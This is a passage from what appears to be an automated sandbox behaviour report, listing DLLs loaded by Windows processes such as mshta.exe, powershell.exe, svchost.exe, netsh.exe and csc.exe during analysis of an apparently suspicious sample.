      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dllJump to behavior
      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winlangdb.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47mrm.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: globinputhost.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: input.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: devobj.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: netsetupapi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: netsetupengine.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: nlaapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: netsetupapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: netiohlp.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: nettrace.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: nshhttp.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: httpapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: nshipsec.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: activeds.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: polstore.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: winipsec.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: nshwfp.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: cabinet.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: p2pnetsh.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: p2p.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: rpcnsh.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wcnnetsh.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wlanapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: whhelper.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wlancfg.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wshelper.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wevtapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wwancfg.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wwapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wcmapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: rmclient.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: mobilenetworking.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: peerdistsh.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: sppc.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: ktmw32.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: mprmsg.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: avicap32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvfw32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winmm.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
